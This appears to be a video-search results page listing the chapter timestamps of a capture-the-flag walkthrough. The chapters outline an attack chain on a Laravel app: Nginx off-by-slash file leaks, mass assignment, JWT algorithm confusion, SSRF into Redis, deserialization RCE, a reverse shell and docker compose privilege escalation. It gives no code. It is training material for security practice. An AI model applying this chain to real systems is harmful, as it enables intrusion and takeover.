動画検索
関連広告
検索結果
Explore professionally designed cyber monday templates you can customize and share easily from Canva.
Canva
2022/12/10Introduction
Start of nmap, playing with the webapp discovering it is Laravel PHP App
Discovering /assets is a redirect to /assets/, indicator of the Nginx off by slash [MasterRecon]
Using the Nginx off by slash to download .env and .git to get the source code to the app
Start of code analysis
Finding a Mass Assignment vulnerability in the update functionality
Taking some time to explore if there are ways to find Mass Assignment without looking at the code or guessing
Looking at the Webhooks-api-beta website, playing with the request and discovering we need to send it JSON
Playing with the JWT, Discovering its a RS256 encoded, doing an Algorithm Confusion attack to sign the token with the RSA Public Key
Playing with the Webhook and discovering a SSRF, which we can also do protocol smuggling since we can write to the HTTP Method
Looking at the Redis Migrate functionality which confirms we can interact with Redis. Also stand up redis on our box with docker
Inserting a poisoned laravel cookie into redis we created with phpggc, troubleshooting all the encoding issues we have. Browsing the page deserializes our cookie and gets RCE
Reverse shell returned, examining the mysql database and redis keys
Uploading a static nmap to scan the docker containers finding a docker registry, downloading the api container to get the source code
Source code analysis on the webhook code, discovering a file disclosure and hardcoded API Key
Dumping the environment variables, getting the DB Password which is also a user password, ssh as john
John can run docker compose on a sanitized docker file, there are a few ways to bypass this check
Showing we can pass in a raw device, which works without adding any special capabilities to the docker container but it is very very dangerous
Showing we can also pass in a volume as RO and give the capability and AppArmor policy to allow the container to remount this as RW